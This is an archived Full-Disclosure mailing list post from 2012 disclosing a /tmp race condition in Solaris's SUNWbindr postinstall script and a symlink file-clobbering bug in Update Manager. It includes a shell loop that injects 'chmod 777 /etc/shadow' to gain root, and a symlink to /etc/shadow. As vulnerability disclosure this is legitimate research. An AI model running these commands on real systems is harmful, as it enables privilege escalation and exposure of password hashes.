[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] file clobbering vulnerability in Solaris update manager & local root with SUNWbindr install.

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] file clobbering vulnerability in Solaris update manager & local root with SUNWbindr install.
From: larry Cashdollar <larry0@xxxxxx>
Date: Fri, 20 Jul 2012 23:40:45 +0000 (GMT)

<html><body><div>+= Local Root<br><br>If the system administrator is updating 
the system using update manager or smpatch (multi user mode) a race condition 
exists with the postinstall script for SUNWbindr that may lead to arbitrary 
code execution as root if the race is won.<br> <br><br>vulnerable code 
in:<br><br>&nbsp; ./patches/119784-22/SUNWbindr/install/pkg_postinstall: 
UPGRADE=${TMP}/BIND_UPGRADE<br>&nbsp; 
./patches/119784-22/SUNWbindr/install/postinstall: 
UPGRADE=${TMP}/BIND_UPGRADE<br> <br>vulnerable code:<br> <br>&nbsp; 
UPGRADE=${TMP}/BIND_UPGRADE<br>&nbsp; rm -f $UPGRADE<br> <br>&nbsp;
 (If I create the file first between these two steps, I should have
 ownership before it is over written and inject malicious code to get 
root.)<br> <br>&nbsp; cat &gt;&gt; $UPGRADE 
&lt;&lt;-\_UPDATE_START_METHOD<br>&nbsp; oset=$@ # Remember current options if 
any.<br>&nbsp; svc="svc:network/dns/server"<br>&nbsp; if [ -z "$TMP" ]; 
then<br> TMP="/tmp"<br>&nbsp; fi<br> <br>If the following is run:<br><br>while 
(true) ; do touch /tmp/BIND_UPGRADE ;echo "chmod 777 /etc/shadow" &gt; 
/tmp/BIND_UPGRADE; done<br><br>during patch installation you can get 
/etc/shadow world writeable.<br><br>+= File Clobbering 
Vulnerability<br><br><pre>Noticed this during routine patching.<br><br>/tmp 
file clobbering vulnerability in Sun Update manager.
7/15/2012

if Solaris Update Manager is run by root and a malicious user creates a symlink 
in /tmp<br>
larry@n1caragua:/tmp$ ln -s /etc/shadow  com.sun.swup.client.LOCK


larry@n1caragua:/tmp$ ls -l /etc/shadow
-r--------   1 root     sys          0 Jul 19 18:49 /etc/shadow

SunOS n1caragua 5.10 Generic_147441-19 i86pc i386 i86pc
larry@n1caragua:~$ 

truss output:

4841/2:         stat64("/tmp/com.sun.swup.client.LOCK", 0xD03FEAB0) = 0
4841/2:         open64("/tmp/com.sun.swup.client.LOCK", 
O_WRONLY|O_CREAT|O_TRUNC, 0666) = 5<br><br>Larry W. 
Cashdollar<br>http://vapid.dhs.org    
@lcashdol<br></pre><br></div></body></html>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: Re: [Full-disclosure] About IBM: results
Next by Date: Re: [Full-disclosure] A modest proposal
Previous by thread: Re: [Full-disclosure] Pwnt 4 Phun or Exposing the Most 'powerful' Hackers in Bulgaria
Next by thread: Re: [Full-disclosure] modest proposal replies
Index(es):
- Date
- Thread